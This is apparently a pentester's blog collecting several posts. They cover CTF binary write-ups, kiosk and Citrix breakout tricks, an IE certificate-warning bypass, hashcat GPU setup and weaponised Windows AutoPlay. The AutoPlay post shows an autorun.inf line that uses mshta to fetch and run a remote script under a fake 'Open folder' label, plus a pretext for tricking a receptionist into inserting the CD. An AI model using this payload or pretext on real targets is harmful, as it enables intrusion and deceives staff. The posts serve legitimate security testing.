Categories
Moved Posts

EMFCTF – Electromagnetic Field CTF Write-Up 2018

So it’s come around once again, EMFCamp is an event held every 2 years somewhere in the UK (usually south of England as far as i’m aware) where people from all walks of life come together to celebrate anything that’s geeky/nerdy or just plain cool!

If you get to go, expect LEDs, Lasers, algorithmically/AI generated techno music, retro gaming consoles. Cool vehicles, crazy constructions, human hacking, blacksmithing, clothes making, recycling t-shirts into cushions… you name it, it’s probably available at the camp. It takes place over a 4 day period (arrive Friday, leave Monday) and is welcoming to all.

I’ve been back in 2016 on my own and managed to make friends with the EMFHam group a few days before I went to have a place to pitch my tent and some people with similar interests to go and hang with in their village. I loved it! it was absolutely brilliant. This year, I neglected to plan ahead and didn’t book off the required leave so couldn’t go in person.

But… the EMFCTF was running and accepting remote applicants so about 6pm on Friday night as I’m about to pack up after a clinic day in work (we do internal conferences three times a quarter) I realise this, quickly register a team as an individual participant (Team: Solomonkey) and get involved.

After a brief twitter interaction to get an account activated (I needed a flag you could only acquire if you were on-site) I was on my way.

Know Your Packets

I’m not going to write these up as it was a pretty easy series of challenges. Most of the issue came from having to interpret what you were seeing to determine the flag. I did like the spam transfer service and the brain melter however, they were fun challenges to figure out, a little bash scripting was required too πŸ™‚

Crack Me

Again, pretty simple series of challenges the one that caused me the most hassle was the one that required film trivia knowledge, I took the hint and still didn’t get it for an entire 12 hours due to a capitalisation issue with my flag submission. I think I pretty much submitted almost the entire script of the movie by the end of it.

Binaries

Here’s where the write ups start. Only 3 as I never did get the 4th one before the scoring time of the CTF ended.

Diff me if you can – 10 points

Two files were provided, diff-me-if-you-can-1 & 2.

I don’t generally do much ELF reverse engineering or debugging so I was already on the back foot. My first port of call with any binary is a quick grep/strings of the thing.

In this case the binary is rather small and this is a quick process.

$strings diff-me-if-you-can-{1,2}

Very quickly a few things drop out that are of interest within the second binary.

Interesting strings

From the above I can guess that the program is doing something to “decode” the actual flag, but lets go deeper…

Downloading ida-free7.0 and running it against the binary to view the disassembly and execution flow reveals a few more things. We find the f14g constant and use ida’s “list cross-references” to identify the function within the program that utilises it.

Ida – “List Cross References To”

Bingo. getspnam is our friend.

Classic loop structure

Looking at the tree view for the function we can see a few things, but from a zoomed out perspective we can guesstimate that the following is happening.

  • There is some setup where the memory address for the encoded flag is loaded into a register.
  • A call to strlen is performed, which returns the string length into a register
  • A comparison takes place between some register and the one holding the length of the string
  • Depending on that comparison it either loops again or it returns from the function call.

Just from my layman’s understanding of the code here I’m assuming that some operation is done to every single character of the flag and sure enough if we look closer at the left hand branch of the loop we can see an instruction to perform a bitwise xor operation against two registers.

Okay I think we can solve this at this point. We know that:

  • There is an encoded string called F14g.
  • The contents of which are: `jga}q66rq66r’~it’acruvhgk{
  • This is used in a subroutine that performs a bitwise xor against it.

Ask the Chef

So one tool you’ll see me use a lot here is ‘Cyberchef’ an open-source JavaScript data manipulation tool release by GCHQ: https://cyberchef.gchq.github.io

It’s an awesome tool for data manipulation and I use it regularly with work.

One of the functions it has is a XOR brute force feature so lets give that a go!

Challenge Completed! – 10 points to SoloMonkey

Et voila! The flag is revealed.

Reverse Brute – 30 points

Lets move onto a 30 pointer, bit of a jump from the previous but lets go.

We’re provided with a single file this time, a .so this file extension denotes a shared library, similar (in layman’s terms once again) to a DLL in windows parlance it contains resources and functions that can be called upon by other executables… but we don’t have any.

First step as always was strings, sadly no dice for a flag but it did reveal a few interesting phrases surrounding namely: “leakkey” and “keystring”.

We’re going to have to do something clever with this one. The clue from the CTF web dashboard was “load, locate and trigger the leak”. In my head this means that we’ve got to somehow load the shared library, locate the leaky function and cause it to fire.

Loading…Triggering…

Lets solve the loading issue first. I initially fell into a rabbit hole of trying to write my own C program to do this, but having never really written C in anger, at least not in the last decade and not being familiar with calling shared libraries either, this was a wasted effort.

Then I recalled something from a python training course many years ago where we were calling functions from win32 dll’s within python. A quick google reveals the ctypes library is just the ticket and a nice and easy bit of code snippet is given for calling functions in an external shared library on linux.

#!/usr/bin/env python
from ctypes import *
rb = CDLL("./reverse-brute-2.so")
rb.leakkey()

is all that’s needed.

Running the above inside of a python interactive terminal results in:

Output! WOOT!

Okay we’ve got ourselves some data. So I headed off to my favourite data manipulation tool once again and attempted to solve the issue. Only right from the off my spider senses should have been tingling, these aren’t anywhere near printable ascii characters (some are unicode printable, but nothing meaningful) and many hours and failed flag submissions later, we’re no closer to finding the issue.

Back to the Code

Lets fire up IDA one more time and have a look at what’s inside.

‘Leakkey’

So we see the ‘leakkey’ function listed on the side and if we view that in tree view once again we’re seeing this classic loop structure. Applying the same reviewing steps we can see the following happening:

  • Some setup occurs where the string length of a constant referred to by “keystring_ptr” is taken.
  • This is used in a comparison to determine whether or not to loop.
  • If its not equal, it performs several operations to it
    • calls _rand
    • appears to use static values of ‘80808081h’ and ‘1Fh’ for something
    • shift left 8 bits – Just from using my head I’m assuming this is iterating through each character/byte in a string/array.
    • calls _getuid – I initially miss this.
    • performs some xor operations,Β  twice over.
    • calls fprintf to print out that particular byte.
    • adds 1 to the counter and loops.
  • If it is equal, it returns to the function that calls it.

So I spend several hours trying to figure this out and getting nowhere (including writing the whole subroutine out on an A4 piece of paper and trying to paper debug what was going on) when I recalled a video by @liveoverflow where he shared some info relating to common tools such as objdump, strace, radare2 and hopper. I remember hopper having a feature of producing pseudocode from the assembly and hopefully making the assembler much easier to read.

Easier to read

So from the above we can now see clear as day, the output relies upon the UID that the parent process is running as. I’d been missing this call all along, or just dismissing it as not having any effect. Argh! *much facedesking occurred at this point*.

Linux has very few iconic “UIDs” the most obvious of which is UID 0 for root, but 500 (red hat) and 1000 (Debian) are both also well known for the traditional start of the user space UIDs. We’ll assume its UID 0 as that’s ubiquitous across all *nix systems.

Easiest way of doing this is just running the thing as root so we do just that.

Different Data!

Given the different data we’ve now got we’re onto a winner it seems and these characters, are all ascii printable!

Another challenge solved!

Flag obtained!

Space Invaders – 40 Points

Okay we’re on a roll, well it seems like it from reading the blog post but in reality we’re down to the final few hours of the CTF and I’ve been pulling my hair out for most of it πŸ™‚

Lets move onto challenge 3. We’re given a single file called “spaceinvaders.hex” and the clue is “this one is weird – what the hell does it run on for a start”.

So we open the file. It looks odd. Sort of like a hex-dump file but not quite. The colon is in the wrong place, there’s no spacing and the memory addresses (or what I’m assuming to be addresses given its just all smudged together with the data) appear different to what I’d expect.

wtf is this?

So I have to admit, initially I thought it was just a malformed file and I tried reformatting things and altering it using sed/awk to make it more “hex-dump” like, I got bored and frustrated with no real success and decided to wing it.

Lets google: “hex file starting with :”

Oh… interesting.

So a click or two later and reading the documentation I see a few things.

  1. This matches our format on a line basis
  2. The file ending ends as stated in it too

I think we’ve found our file-type. Now how to deal with it. Reading the above web page and just under the section that accurately describes our EOF signature/magic number, there is a link that discusses “Converting HEX, Binary, etc file formats”: http://www.keil.com/support/docs/4038.htm

Reading through it talks of windows executables but also of a linux package available from sourceforge called “srecord” a brief apt search comes up trumps and there is already a package in the ubuntu repositories for srecord!

SRecord found in Ubuntu Repository!

A brief install and we’re left with a few executables that are preceded with the prefix “srec_”.

One of these “srec_cat” appears to be used for concatenating Intel hex files together, only by default it seems to be configured for a Motorola EEPROM format, we don’t want that. We want Intel format.

After scouring through the man file for a bit, and a little trial and error, the line we’re after is:

srec_cat space-invaders.hex -intel -output space-invaders.bin -binary

Now with a binary file, we can go back to our default mode of handling binary reversing, lets use GREP! – What? you were expecting strings?, well Grep does support binary files and now after submitting flags previously we definitely know the flag format, it saves us having to scroll through a bunch of string output πŸ˜‰

grep -io --text flag{.*} space-invaders.bin
Take that evil aliens! πŸ™‚

And that’s the final flag we managed to obtain for the binary challenges.

The End?…

So no. There was one more challenge called Das Uboot remaining in the binary pile and I failed to beat it, in the end only a single team “Never Try” actually did solve it. I still have the flash.bin here and I should in theory be able to solve the challenge so I’ll keep plugging away and maybe someday I’ll post how to do that one too.

Sploity challenges? Nope, I had a quick look at them but they came up right at the end of the last day and I got nowhere, given they are remote network services, I probably won’t get to write those up and hope to read write ups from the teams that did: GraceHoppersPosse and Never Try.

One thing I am relatively sure of is that I probably didn’t solve any of these challenges in the intended manner. I approached it from the perspective of someone unfamiliar with the use of debuggers and reverse engineering on Linux and got lucky.

Ultimately in a CTF, the journey doesn’t matter the destination does. What I can tell you is that these few lines of solution do not include the HOURS and HOURS spent smashing my face against them. I spent most of the 3 days trying to solve these and I learned a hell of a lot in the process and that’s what this is to me. An opportunity to educate myself and practice topics I generally don’t make use of in my typical workload.

How do I think I did?

So its difficult to judge, I was doing stuff in this challenge that I’ve not really played with before I’ve learned a hell of a lot about interrogating binaries on Linux and my wireshark-fu is through the roof after completing all the “know your packet” challenges.

I was also just one man against teams where multiple people were in play. I ultimately finished 5th overall after being pipped to the post for fourth by Team LB in the final hours of play.

Additionally, these teams were all on-site and able to compete for the 237 marks up for grabs in the scavenger hunt. There were several times when I wished I was on-site during my downtime so I could go for a walk and still score 3 points for each scav hunt flag I completed.

If you look at the breakdown between myself and the 4th place finishers Team LB it becomes more evident how much I lost out by not being on-site. Lesson Learned – ALWAYS buy tickets for EMFCamp ;).

Only off-site challenge points obtained (aside from account activation flag)
~80% of their score from Scav Hunt flags

Despite all the above however, I learned a hell of a lot from this CTF and would highly rate it for anyone to have a go, it was great fun to participate in and I’ll definitely be back again next year, this time hopefully alongside a team of people and being able to participate in the on-site challenges.

“Award Points”

Ugh!!! So I took the hits with hints in this CTF. Very often I’d get to the end of a challenge and still not be able to submit a valid flag and I’d take the hint. In every single case except 1 (the film trivia crack) the hints given were of no use to me given where I was in the challenges. It’s a chance and decision you have to take/make on a coinflip but I basically threw away 21% of my score to hint penalties which I really shouldn’t have taken.

Follow up videos…

I have a bunch of recorded videos of me solving the above challenges that I intend to edit and post up on YouTube. I’ve narrated them via voice over so you can sort of see my thought process throughout. These will be getting uploaded “soon”.

Thanks to the organisers of @emfctf who I believe are a team from Cisco Security, what once was Portcullis/Portcullis Labs.

Cool things you need to check out

LiveOverflow – This person regularly posts “how-to” videos for reversing, crack-mes, ctf challenges. I’ve learned basically almost all the techniques I performed above thanks to their videos.

https://www.hackthebox.eu – awesome hacking challenges and VMs perfect for practising your skillz πŸ˜‰

 

 

Categories
Moved Posts

Quick noddy breakout tip using Favourites

I did another Citrix breakout job just the other day and as per usual found the effectively cosmetic only lockdown provided for by group policy… remember kids: “Group Policy is not a security boundary”.

So I had a bit more of a play about imagining I had less access than I did. Turns out that while file paths and calls were correctly disabled within the address bar of internet explorer, I could quite happily specify them as a link within the favourites bar by modifying a pre-existing favourite and then clicking it.

“Right click, add toolbar, links”
Why on earth does this method work if paths are disabled in IE?!

Clicking the abused favourite link would then pop explorer (or tbh anything you like, its effectively a .lnk at this point).

Yes… classic armadillo security – Crunchy on the outside, gooey on the inside. #DimeBar

Not world-destroying by any means but yet another method of breakout worth considering. Not sure why i’ve not used this before now but meh, its one to remember for next time πŸ™‚

Categories
Moved Posts

Updating the Thinkpad X220 Bios…

So this is more for my notes and I suppose to save anyone else out there the pain i’ve just gone through for the last few hours trying to upgrade my v1.20 bios to the latest 1.44.

So I followed endless guides after failing a few times myself and nothing seemed to work. Grub image booting was the closest but in that mode while it successfully booted the update tool, it disabled the onboard keyboard and no external usb keyboard I had available would work either.

You will need for this:

  • Windows VM
  • Yumi MBL (the stable version worked fine for me, didn’t need the UEFI beta)
  • A suitable usb key that is seen by your thinkpad within the BIOS.
  1. First, plug in the usb key you intend to burn the image to into the laptop.
  2. Not all my USB keys worked, I had more success with USB2.0 usb keys vs USB3.0 supporting ones.
  3. Bounce the box and get into the bios.
  4. Navigate to where you can specify the boot order.
  5. Look for the label of your USB drive showing next to USB HDD. If its not there, you’re going to need another key. If it is continue!
  6. Set the order such that the USB will boot first in the list.
  7. Set the bios boot support to both (not UEFI only, we’re going legacy mode here just to get the damn thing to boot).
  8. bounce the box and boot into your OS.
  9. Fire up your windows VM. Download YUMI Multiboot linux executable to disk.
  10. Download the lenovo update image available from the lenovo support website.
  11. Get your usb key into your windows VM.
  12. Using YUMI MBL, select the option to “boot unlisted iso (GRUB)” and tick “format fat32” then select the lenovo iso.
  13. Click next, etc… and wait for the usb key to be created.
  14. When created, reboot your host, leave the usb key where it is it’ll hopefully (providing you’ve set up the boot order correctly) boot up just fine on its own.

YUMI will boot and offer you a grub menu, select “boot unlisted iso” and select the lenovo iso from the list.

This will finally get the iso booted and crucially you’ll have a keyboard that works. Check it with a quick f1 before you go any further, if it doesn’t work you’re on your own. I spent like 6 hours trying different combinations to get this damn thing updated.

Select option 2 to start the upgrade process, accept the warnings and wait a while. It’ll warn you and offer you the opportunity to “do not remove the cd or remove the cd”. Pull the usb drive at that point and hit enter.

Your Thinkpad will reboot, you’ll see a message saying “updating electronic control program” or words to that effect for a short period of time before another reboot and it booting into your original hdd os.

Reboot once again and smash that thinkvantage button (if thinkvantage button doesnt appear to be working, alternate smashing the f1 button too) to get back into the bios check the version numbers, they should now be updated. Go back through where you’ve screwed with your boot order and UEFI support and set them all back to where you want them and you’re done!

Grab a cuppa, stick your feet up and chill, you’re done!

Categories
Moved Posts

Control Panel Funtimes – Basic but worthy of note

Accessing control panel applets via control.exe and rundll32 or just directly calling the .cpl, like ncpa.cpl to access network settings is not new.

I find myself often referring to a friend’s blog over here: https://www.attackdebris.com/?p=143

Where he breaks out some of the other tools that are always handy on a breakout job, the amount of times that the dsquery line has come in handy on everything from breakouts to redteam engagements is insane.

What is new however is me losing my damn notes file on them, thankfully it seems Microsoft has published their own notes so for those of us with rubbish memories…

Here you go: https://support.microsoft.com/en-us/help/192806/how-to-run-control-panel-tools-by-typing-a-command

Key bit: “rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl”.

Oh and another golden oldie while we’re at it, introducing Godmode a feature that’s existed for bloody yonks…

  • Create a folder
  • name it: GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
  • Open it.

See shortcuts to every control panel option your account should have access to.

Categories
Moved Posts

Using your Intel Integrated GPU with Hashcat

Intro

I recently put together a presentation for work to try and instil some more intelligence into folks hashcracking attempts beyond just throwing the largest dictionary possible with a massive ruleset against it and calling it done.

As part of that talk I raised the point that installing the Intel OpenCL runtimes for your CPU doesn’t have to be the be all and end all. If you don’t mind a bit of kernel module compilation, you can also have your intel hd graphics do the heavy lifting and you’ll notice some performance gains above your CPU.

Supported driver configurations for hashcat v4.0.1

I last did this a year or two ago and it was incredibly mandraulic and painful, but it turns out there is now a script (or i just plain missed it the first time around) available by intel that providing you’re using one of their “supported” platforms you can run and it’ll handle the dependency hell and installation of the custom kernel.

You should note, Hashcat considers the intel gpu runtime to be broken and while booted into the 4.7 kernel I don’t appear to be able to force the selection of my CPU for cracking, though it is listed as an opencl device so whether you still want to go ahead with this is up to you.

Getting Started

First, I suggest reading through stuff on: https://software.intel.com/en-us/articles/opencl-drivers#latest_linux_driver

Then you need the installation script: https://software.intel.com/file/555660/download%20Edit

I’m assuming you’re running ubuntu 16.04 LTS as that’s what I have here, you can confirm this with a cat /etc/lsb-release. It should come out like mine:

Pre-Requisites – Ubuntu 16.04

Warning: The next stage on an intel i7 5600u took just over an hour to complete. Ensure your laptop is plugged into the mains and you’ve got the time to wait in order to compile the kernel.

Do a apt full-upgrade and a reboot before starting, then just call the script.

sudo ~/Downloads/install_OCL_driver.sh install

Accept the warning if you’re ready to proceed

Then wait…

Reminds me of the XKCD cartoon “Compiling”

An hour later you should get:

All completed, just need a reboot

Quick Reboot, select the 4.7 kernel in grub and you’re finished! Nice and easy.

Performance comparison

So this isn’t a definitive sample obviously but here is a comparison between the same benchmark run on CPU vs GPU.

WPA2 Performance using Laptop CPU
WPA2 Performance using Laptop Intel GPU

So a nice 50-ish% gain in performance. Not quite as high as I seem to remember when I first did this but my memory has been rotted by far too much beer consumption and times change.

Happy Cracking!

Categories
Moved Posts

Playing with AutoPlay

Intro

First… holy balls I have a blog still. No posts in ages (well 2016 but that post was written originally in 2013)!? crikey! Thing is life got in the way and information got shared and noted via other means. This doesn’t mean I wanted to leave me blog in the dust but it did mean that a quick message to a WhatsApp group or email to work colleagues was probably easier to share information than sitting down and penning a blog post.

Anyway lets get to it…

So this originally stemmed from questions from a colleague regarding a kiosk breakout he was doing and me talking about abusing popup bubbles and boxes to attempt to break out of restrictive environments. What causes a popup bubble? well many things, including that of a CD-Rom being inserted.

So an idea formed in my head, maybe we can abuse autorun.inf still to help us in a bid to breakout of a lockdown. Turns out it lead me down a bit of a rabbit hole and I think I now have a “thing”.

Thing? or not a Thing?

So this is the question, I’m interested in your opinions if you read this at all. Is this a thing? should I be considering this a thing? Because it just doesn’t really sit right with me, I can’t help thinking that “this is by design” but if it is then I think the design needs refinement.

Have a read of what follows and see what you think.

AutoPlay vs AutoRun

This probably isn’t news to anyone but back in the day (prior to 2010) you used to be able to write yourself a lovely little autorun.inf file that could specify a few items and you’d have yourself a USB key for example that would execute a malicious payload the moment it was mounted.

Microsoft got wise to it and disabled autorun on devices with a device type of removable_drive(1) via a patch on Windows XP.

To enumerate device types use the following powershell command:Β 

PS> Get-Volume

Fixed, Removable and CD-ROM device types will be listed.

It replaced it with a feature called “AutoPlay” which instead of automatically executing whatever file was specified within the autorun.inf the operating system would present a menu to you in order to choose your action.

Now you can set a default action for a particular type of media but generally the menu always appeared.

Type of media? what do you mean?

So AutoPlay would categorise media based on the files contained within the media itself. There are 3 main types:

  • Pictures
  • Music
  • Video

and a fourth special primary type of “mixed”.

If media matched any of the first 3 types, a default set of menu options would be presented, generally “view photos”, “play audio via …”, or “play video via …”. If the fourth special type matched a menu would present itself offering the user to open the folder to view the files in windows explorer or do nothing.

There are other “types” including the ability to define other types within the registry but this article is taking place from the perspective of not having prior access to the devices.

Essentially it seems windows attempts to do content-sniffing of media content and acts appropriately. however that doesn’t lend itself well to people who produce software installations via CD, they still wanted to be able to make installation an easy process for any user so Microsoft catered for it.

On a USB key you’re by default presented with a fixed menu that is wholly determined by the media type and I don’t believe you can change this (aside from a little trickery that others have done using U3 style devices) On a CD however, things change, you can specify custom actions

Controlling AutoPlay

So Microsoft offers folk the ability to customise the actions that can be performed when a CD-Rom is inserted, these options are still defined using the autorun.inf file and even makes use of the same terminology, retaining backwards compatibility with older CDs. So you have two basic options.

  • Open – specify an executable to run on insertion of CD
  • ShellExecute – Specify a file to open on insertion of CD, relying upon the OS to determine the default file handling application.

We’re particularly interested in Open in this case but i’m sure ShellExecute could prove useful in some cases.

First Attempt at Weaponisation

With the basics of autorun.inf understood. i’m curious what can we do with this that may be different to traditional use of autorun.inf? From reviewing the autorun.inf documentation on technet it became apparent that the Open command will happily take a filepath, not a relative one but a full filepath, allowing you to specify any executable on the host to run.

Wait, a CD-Rom can run any executable it likes on the OS as part of the autoplay feature?

Well that’s useful if we’re trying to pop out of a restricted environment and being unable to browse say the local filesystem, if we can get autoplay to pop, a click later we could be running powershell, iexplore.exe or any other exe that will enable us to breakout, depending on GPO obviously.

Okay, chances are if autoplay can run it, we could find other ways of calling those apps but hey, it could result in a quick and easy insert cd and pop out of the restriction.

Back to reading technet and this gem stuck out from within the Open parameter description:

You can also include one or more command-line parameters to pass to the startup application.

So as a default thing, I can get a menu entry on autoplay to attempt to execute any OS executable complete with a nice list of arguments and my CD doesn’t even need any content beyond an autorun.inf file?

This sounds ripe for abuse and this is where a bit of inside-the-box thinking comes into play.

Subtee – A man who has gone to town on windows executables and bypassing DG/Applocker/SRP has a few tasty ways of getting scripting languages to pop on a box. Let’s take what he’s taught us over the last few years and put a little something together.

Using MSHTA method to pop shells

Okay so we’ve got something here, problem is, it looks dodge as hell as it comes up as mshta.exe, the “Published by Microsoft Windows” bit is a nice touch however, adds some legitimacy to the whole affair and I guess its a consequence of using a signed binary.

Lets see what we can do to make it look a little better.

Keeping up Appearances

Using the same technet resource as before we can see a few other options available for us.

We can customise the “action” text associated with an autoplay entry.

So “Execute mshta.exe” can be changed to say “CLICK HERE FOR FUNTIMES!” or more usefully, “Open folder to view files”.

We can also customise the icon displayed associated with that default action and this is where a little bit of recon for your targets may come in handy as the icon associated with the “Open folder to view files” action varies based on OS.

So a few changes later, our autorun.inf file looks like this:

[autorun]
action=Open folder to view files
icon=icon2.ico
open=mshta.exe vbscript:GetObject("script:http://127.0.0.1:80/webapp/static/91f3c_rg")(window.close)

and we’ve for argument sake included the icon file on the CD itself, its not malicious it should never be flagged.

Even better, we used Joliet mode and set the files to “hidden”…

I’ve set up a nice internet hosted script that will be grabbed by the exploit code (yay for proxy aware executables!) and now for the final reveal.

Now with custom text and icon!

Final bit of dressing up is asking explorer.exe to pop open and display the CD Drive, luckily because the working folder is in fact the CD drive itself we can easily do this by just appending explorer.exe to the end of our payload.

Conclusions

With a little bit of luck (we can make it through the night) and a little recon via email and monitoring user agents we can develop a completely benign CD targeted against our specific client infrastructure that if scanned won’t flag to AV because autoruns.inf isn’t executable right? that actually runs malicious code should the user click the default action associated with the CD (This was tested against windows defender, your mileage may vary).

If the user chooses not to answer the popup, and double clicks the CD instead, it’ll also run the action.

Final video of exploitation is here.

I also noticed a few things I forgot to point out at the end of the last vid so here’s an addendum πŸ™‚

Deployment

So this is the awkward thing, anyone in the UK doing red team engagements is probably aware of the dangers of the traditional “USB DROP” in the car park. It’s dangerous, can result in malicious code being executed on non-target PCs and generally iffy.

Also most people these days undergoing security awareness training have it drilled into them that USB devices are bad and shouldn’t be plugged into corporate machines.

Then there is the disabling of USB devices, no USB Mass Storage Drivers, etc. DLP technologies.

The beauty of a non-writable CD-Rom it’s seen as benign, okay sure i’ve worked in places where executables hosted on a CD-Rom are deliberately prevented from executing, but this isn’t hosting any executables. This attack method doesn’t introduce anything into the environment via CD-Rom beyond a little one-line script/shortcut execution.

Yes CD-Rom’s these days are falling out of favour, Yes you can use this with other techniques that turn USB keys into CD-Rom appearing drives (2), but this is targeting the Receptionist’s PC.

We’ve established carpark drops are iffy, what can we do as a red teamer or SE person to ensure our payload gets delivered to a less iffy location?

Why not just walk in and hand it to someone?

Me: “Hi, er I think this CD may have come from one of your staff members. I found it in the car park”

*hands CD to receptionist*

Me: “Looks like it’s wedding photos, i’d be devastated if I lost mine so thought I’d try and get it back to them”

Receptionist/Security: “Sure! Thanks, no worries i’ll see if it’s any of our employees”

Voila!

  • CDs weren’t covered in their last e-learning on Security Awareness Training
  • You’ve given the CD directly to an employee of the company
  • You’ve given a back story that encourages the employee to view the wedding photos to identify a staff member.

Happy Phishing!

References

  1. https://msdn.microsoft.com/en-us/library/windows/desktop/cc144206(v=vs.85).aspx
  2. https://spareclockcycles.org/2010/11/21/the-usb-stick-o-death/
Categories
Moved Posts

NFAL: Episode Two (Point 5) – Breaking out of the Jail

Foreword:

I started writing this blog post a long time ago (October 2013 wordpress tells me) and figured it was about time I published it just to clear my decks of “draft” posts as it were. I intend to publish things more often but maybe not all Pentest based, some ham radio and electronics gumpf may filter into it as those are also hobbies of mine.

With that and the slight addition that this was going to be NFAL Episode Two on it’s own so its now kind of NFAL Episode 2.5 The continuing adventures of noddy testing… on with the original post!


Background

Forgive me if this comes across as teaching all 1 of my readers to suck eggs but this is just a dump of common ways I often find useful for breaking out of kiosk jails.If you’re a penetration tester or even a savvy user, chances are you already know of these methods but this is noddy stuff, purely because I thought it made for a fun blogpost, it was fun playing with it on client systems at least.

I did this as a talk at an internal company training day and titled it “Smashing Windows” slides for the talk will be attached at the bottom of the blogpost for what it’s worth but I’ve no recording of it and this blog post is essentially just it regurgitated from memory πŸ™‚

Recently I did some testing involving the “Remote Application” features of terminal services through a terminal services web gateway.

Initially logging in using AD credentials on the front page you’ll be presented with a few icons on the webpage which in turn launches applications. (Similar to CITRIX stuff i’ve seen in the past). You get presented with a full application as if it is on your desktop, similar in the way VMWare Fusion works on the Mac, its not a full “session” but rather an “application session”.

The beauty with it (at least from our point of view) is that File – Open, will open files on the remote server (providing they haven’t GPO’d paths out of the address bar, etc).

Spawning any processes will spawn them on the remote server and present them to you over terminal services. So if you get an external link to click, it’ll spawn IE which again will be on the remote server.

Another thing to note is that the processes you’re spawning will be on the application server serving that particular application not the web host that is just presenting the applications.

For a recent client I had access to about 6 different applications each one hosted by a pair of load balancing application servers. So breaking the jail on one, got me MSTSC and I just logged in using that into the other application servers/etc that made up the network (having a nice portable portscanner/discovery tool is very useful at this point).

Method #1 – Open Sesame

The File Open and File Save dialogs are king. If you have access to one of these you’ve basically got a mini explorer.exe. There are several avenues of attack.

The File Open dialog box, a veritable feast of juicy jail breaking goodness.
The File Open dialog box, a veritable feast of juicy jail breaking goodness.

The Orange Box – Known as the breadcrumb, this little thing normally is affected by some GPO and is limited in use but can be handy hopping back up the directory structure.

The Yellow Box – Filename box, Unlike the breadcrumb this one appears to be affected by different GPO policies and is not always locked down. I have been able to browse to C:\windows\system32\cmd.exe in here when the breadcrumb wouldn’t let me out of my own profile. Try typing exact paths to existing files and you may find yourself lucky.

The Red Box – Search and Help. Two great ways of breaking out of the jail. Search can often get you files, providing your “high” enough up the tree. Help can find you ways of popping Internet Explorer open. So can search if its unsuccessful finding files, it’ll often prompt you for “search online” which will likely result in IE spawning.

The rest… it’s unlikely you’ll get a nice folder pane on the left hand side, normally you’ll end up with some basic folders available but no ability to browse out of your user profile if its locked down, but its worth a quick look and the file type box, that will limit you when writing a file or saving one. If it has an “all files” option, that’s better.

Finally right click! try it… if you’re lucky you’ll be able to write a file, rename it to .bat or .vbs, get some script running commands for you, its a long shot but hey it might work.

Method Two: IExplore.exe your hard drive

Aside from the usual address bar file://c:\ or browsing to your own metasploit browser autopwn. There are also ways and means of breaking out of this that aren’t so obvious.

File – Open… Or the address bar, IE can open any files. It’s not limited by file filter, it can also open network resources just fine and view folders. Great for accessing hack armoury resources.

Drag and drop… Want to exploit the file “open with” dialog? Drag and drop an unknown file extension onto it and it’ll pop it right up after you hit “open”.

Working on an embedded windows client (*Cough* Embedded XP Wyse Terminals*cough*) and have no access to the file system? That sucks. Try tools – Internet options, open objects and open files will often net you two different drives, the first being the system ram drive, the second being your user profile area.

IE-objects-files-jailbreak

Finally, have access to the file system but still can’t spawn anything interesting? Try firing up word or any of the office suites, how?… Look for “read me” and licence files.

You may get lucky and find some .doc style terms of service links or be able to create your own .doc. Once you’re in word go for macro execution and you’re winning.

Method 3: If in doubt… give it a clout!

Also consider the windows error reporting dialog, on one particular job I couldn’t access notepad.exe myself and the file open dialog I had access to could only see *.acme files, so was pretty useless.

Help and support was disabled so help got me nothing, however entering in a string instead of a number into an input field of the application would cause the application to crash and the windows error reporting window to pop up from there I viewed the microsoft privacy policy and pow… Internet explorer! which lead me onto bigger and better things πŸ˜‰


Powerpoint Presentation: Smashing Windows

Categories
Moved Posts

NFAL – Episode Three: Testing websites while on locked down clients

Or… Yet Another GPO Bypass Technique.

On occasion I get given the task of testing a client’s website using the terminal provided by said client in order to in the client’s words “Prove what a malicious user can do with the tools we give them”.

So in order to not drive myself mental trying to pentest a web app manually in IE, without being able to change any settings. I work out a way to get burpsuite on the box.

The beautiful thing about burpsuite being that it’s JAVA and java.exe happens to be one chuffing huge hole with endpoint protection mechanisms and application whitelisting.

Okay so problem 1 solved.

Onto problem 2 now, they lock down their “connections” tab in internet settings but as we already know how to bypass whatever pre-existing proxy connection they have and replace it with our own burpsuite details using a little VBA and the techniques given in this postΒ this is no longer a problem.

Problems always come in threes so what is problem 3 you ask?

This:

IE: "You Shall Not Pass!!!" Me: O RLY?
IE: “You Shall Not Pass!!!”
Me: O RLY?

Or more specifically, the distinct lack of a “continue” link to allow us to ignore the self signed cert warning and continue with our traffic being intercepted by our burpsuite proxy.

This situation is actually a product of the following GPO setting:

It took me far too long to find this damn setting in GPO :)
It took me far too long to find this damn setting in GPO πŸ™‚

Anyone who’s been around any length of time with IE probably already knows that this error page is a resource loaded from a local dll. This is true for every “friendly http error” message you get in IE.

Question is, how does the DLL know not to show the “continue” message?

It does it by a variable within the URI, what variable? the “PreventIgnoreCertErrors” variable. This variable is usually not shown with the error message unless the GPO setting is set to enabled.

IE: YA RLY!
IE: YA RLY!

So you know what is coming next, yup. Copy Pasta my friends, So copy & paste and remember to change the damn variable to 0 before taking a screenshot πŸ˜‰

WHAAARRRGARBBBBLLL!
WHAAARRRGARBBBBLLL!

and hit enter.

Open Sesame
My mind’s telling me no, but my body, my body is telling me yessss!!!

And finally, do what the message says, click continue…

IE: NO WAI!!!! Me: Ya... Wai.
IE: NO WAI!!!!
Me: Ya… Wai.

Voila! Now you can test with your self-signed burp certificates or bypass yet another security control (that is actually a fairly wise one to have) on your network.

Categories
Moved Posts

SteelCon 2015

So its the day after the conference and I sit here in bits. Unfortunately since friday i’ve been struck down with an attack of sciatica however I downed my ibuprofen along with a few paracetamol for good measure and drove the many hours up’t north and found myself in Sheffield at the best conference I have had the pleasure of attending thus far.

Robin (@digininja) appears to have taken all of the best bits from every conference out there and packaged them into one incredibly affordable weekend.

It started on the friday when arriving up in sheffield, the actual real conference starts on the saturday but there is a well publicised “pre-con” meet up in a local tavern. The best bit about this being a relatively new to the field (4ish years now) and shy as hell i’m not exactly known to anyone. I’m not in the league of sausages, I know a few testers and I can now recognise a few of the twitter legends I follow, but I’m not exactly on any invite lists for pre-con meetups or beers.

All of that doesn’t matter here, as its a publicised meet up, everyone rocks up and all of a sudden I’m talking to folk such as digininja, Finux DaveHardy20, FreakyClown, etc… people i’ve followed since starting out in the world of infosec, over a few beers and shooting some pool.Β  There are no barriers and for someone who suffers from extreme social anxiety usually, I found it brilliant.

